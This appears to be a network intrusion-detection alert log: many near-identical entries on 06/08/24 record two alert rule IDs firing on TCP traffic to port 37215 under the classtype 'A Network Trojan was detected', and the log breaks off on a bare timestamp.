          Timestamp:06/08/24-15:05:29.071221
          SID:2829579
          Source Port:40826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857914
          SID:2829579
          Source Port:49676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819346
          SID:2829579
          Source Port:47732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404547
          SID:2835222
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912426
          SID:2835222
          Source Port:50658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022057
          SID:2835222
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266585
          SID:2835222
          Source Port:33398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272363
          SID:2835222
          Source Port:43340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462192
          SID:2835222
          Source Port:56138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797472
          SID:2829579
          Source Port:45332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293240
          SID:2829579
          Source Port:39756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.144870
          SID:2829579
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275253
          SID:2835222
          Source Port:34574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020549
          SID:2835222
          Source Port:38732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510272
          SID:2829579
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602755
          SID:2835222
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035131
          SID:2829579
          Source Port:49276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239235
          SID:2835222
          Source Port:57932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041039
          SID:2835222
          Source Port:58354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191752
          SID:2835222
          Source Port:43076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671816
          SID:2829579
          Source Port:48270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157852
          SID:2835222
          Source Port:33478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817778
          SID:2829579
          Source Port:50172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176467
          SID:2829579
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110684
          SID:2835222
          Source Port:51246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887678
          SID:2835222
          Source Port:38794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274631
          SID:2835222
          Source Port:46864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884488
          SID:2835222
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161566
          SID:2829579
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912601
          SID:2835222
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857026
          SID:2829579
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447187
          SID:2835222
          Source Port:40836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131715
          SID:2829579
          Source Port:51284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297327
          SID:2835222
          Source Port:40840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.458018
          SID:2829579
          Source Port:58008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554340
          SID:2829579
          Source Port:50652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515800
          SID:2829579
          Source Port:38534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160196
          SID:2829579
          Source Port:51858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862477
          SID:2835222
          Source Port:35622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177292
          SID:2835222
          Source Port:57362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274478
          SID:2835222
          Source Port:37454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817550
          SID:2835222
          Source Port:34622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129265
          SID:2835222
          Source Port:40946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808866
          SID:2829579
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176115
          SID:2835222
          Source Port:47320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730337
          SID:2835222
          Source Port:59670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671409
          SID:2835222
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892384
          SID:2829579
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465944
          SID:2835222
          Source Port:41220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020771
          SID:2835222
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152556
          SID:2829579
          Source Port:39546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351254
          SID:2835222
          Source Port:38846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126554
          SID:2829579
          Source Port:60892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063226
          SID:2835222
          Source Port:48144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2829579
          Source Port:57260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110483
          SID:2829579
          Source Port:45982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239410
          SID:2829579
          Source Port:41376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901518
          SID:2835222
          Source Port:48870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853253
          SID:2835222
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858057
          SID:2835222
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731914
          SID:2835222
          Source Port:44324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667528
          SID:2835222
          Source Port:35796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110180
          SID:2835222
          Source Port:46126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782069
          SID:2835222
          Source Port:38472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460730
          SID:2835222
          Source Port:43298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449273
          SID:2835222
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463750
          SID:2829579
          Source Port:40186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.794947
          SID:2835222
          Source Port:42234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670454
          SID:2829579
          Source Port:49308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109000
          SID:2829579
          Source Port:39284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670109
          SID:2829579
          Source Port:34666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404600
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812663
          SID:2835222
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260038
          SID:2835222
          Source Port:54626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020834
          SID:2835222
          Source Port:52842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846363
          SID:2829579
          Source Port:40062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861828
          SID:2829579
          Source Port:38128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021133
          SID:2835222
          Source Port:58888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893346
          SID:2835222
          Source Port:37270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161290
          SID:2835222
          Source Port:52824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741781
          SID:2829579
          Source Port:59136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495644
          SID:2829579
          Source Port:42910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242601
          SID:2829579
          Source Port:52356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130271
          SID:2829579
          Source Port:58220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107436
          SID:2829579
          Source Port:35642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668144
          SID:2835222
          Source Port:57396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157019
          SID:2835222
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816692
          SID:2835222
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465451
          SID:2835222
          Source Port:34130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667665
          SID:2829579
          Source Port:59688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081196
          SID:2835222
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2835222
          Source Port:38554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743177
          SID:2829579
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816863
          SID:2835222
          Source Port:46358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495986
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407344
          SID:2835222
          Source Port:59064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553036
          SID:2829579
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059748
          SID:2835222
          Source Port:59400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784364
          SID:2835222
          Source Port:48542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470525
          SID:2829579
          Source Port:51976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038499
          SID:2829579
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670342
          SID:2829579
          Source Port:60500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126070
          SID:2829579
          Source Port:58264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043078
          SID:2829579
          Source Port:38340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162901
          SID:2835222
          Source Port:50802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059558
          SID:2829579
          Source Port:58340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599802
          SID:2835222
          Source Port:48476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671858
          SID:2835222
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446258
          SID:2835222
          Source Port:57638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447092
          SID:2829579
          Source Port:34272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035090
          SID:2835222
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446171
          SID:2835222
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449950
          SID:2829579
          Source Port:53798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742446
          SID:2829579
          Source Port:58908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295760
          SID:2829579
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781196
          SID:2829579
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353825
          SID:2835222
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469190
          SID:2829579
          Source Port:40326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671490
          SID:2829579
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843718
          SID:2835222
          Source Port:48140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850456
          SID:2829579
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893720
          SID:2829579
          Source Port:46002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734369
          SID:2829579
          Source Port:35422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112081
          SID:2835222
          Source Port:41776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602918
          SID:2835222
          Source Port:52820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179626
          SID:2835222
          Source Port:55082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808222
          SID:2835222
          Source Port:35956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784015
          SID:2829579
          Source Port:43100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262532
          SID:2835222
          Source Port:49556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354635
          SID:2835222
          Source Port:49986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020518
          SID:2835222
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177508
          SID:2835222
          Source Port:41842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257189
          SID:2829579
          Source Port:60624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.146895
          SID:2835222
          Source Port:59404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128032
          SID:2829579
          Source Port:46274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820867
          SID:2829579
          Source Port:59162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555445
          SID:2835222
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448664
          SID:2835222
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158965
          SID:2829579
          Source Port:33048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671619
          SID:2835222
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846338
          SID:2835222
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264816
          SID:2835222
          Source Port:35870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806251
          SID:2835222
          Source Port:37410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356981
          SID:2829579
          Source Port:56350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356896
          SID:2835222
          Source Port:56268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448437
          SID:2835222
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159742
          SID:2835222
          Source Port:33732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731348
          SID:2835222
          Source Port:33682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175727
          SID:2835222
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240323
          SID:2835222
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241647
          SID:2835222
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159194
          SID:2835222
          Source Port:44910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306601
          SID:2835222
          Source Port:53438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407967
          SID:2835222
          Source Port:33348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732632
          SID:2835222
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850320
          SID:2835222
          Source Port:46206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835641
          SID:2835222
          Source Port:49478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746696
          SID:2829579
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512558
          SID:2829579
          Source Port:35890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269382
          SID:2829579
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733982
          SID:2829579
          Source Port:36982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603402
          SID:2835222
          Source Port:47732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744405
          SID:2835222
          Source Port:56270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021926
          SID:2835222
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025976
          SID:2835222
          Source Port:34382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044209
          SID:2835222
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663815
          SID:2835222
          Source Port:56170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449246
          SID:2835222
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747165
          SID:2829579
          Source Port:41048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668611
          SID:2829579
          Source Port:52700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600172
          SID:2835222
          Source Port:33746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791957
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178729
          SID:2835222
          Source Port:55208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731485
          SID:2829579
          Source Port:51942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442100
          SID:2829579
          Source Port:48574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263851
          SID:2829579
          Source Port:43414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166450
          SID:2835222
          Source Port:52396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113275
          SID:2829579
          Source Port:34040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296924
          SID:2835222
          Source Port:53020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241134
          SID:2829579
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815455
          SID:2829579
          Source Port:57794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888761
          SID:2835222
          Source Port:46162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857880
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272654
          SID:2829579
          Source Port:35880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601242
          SID:2835222
          Source Port:47910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153711
          SID:2835222
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166002
          SID:2835222
          Source Port:56770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446482
          SID:2829579
          Source Port:47980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017176
          SID:2829579
          Source Port:38670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600076
          SID:2835222
          Source Port:39016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820809
          SID:2829579
          Source Port:38104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548095
          SID:2829579
          Source Port:38606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732574
          SID:2835222
          Source Port:56340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161412
          SID:2835222
          Source Port:46126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854646
          SID:2829579
          Source Port:35632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509030
          SID:2829579
          Source Port:44662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895172
          SID:2835222
          Source Port:48194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352509
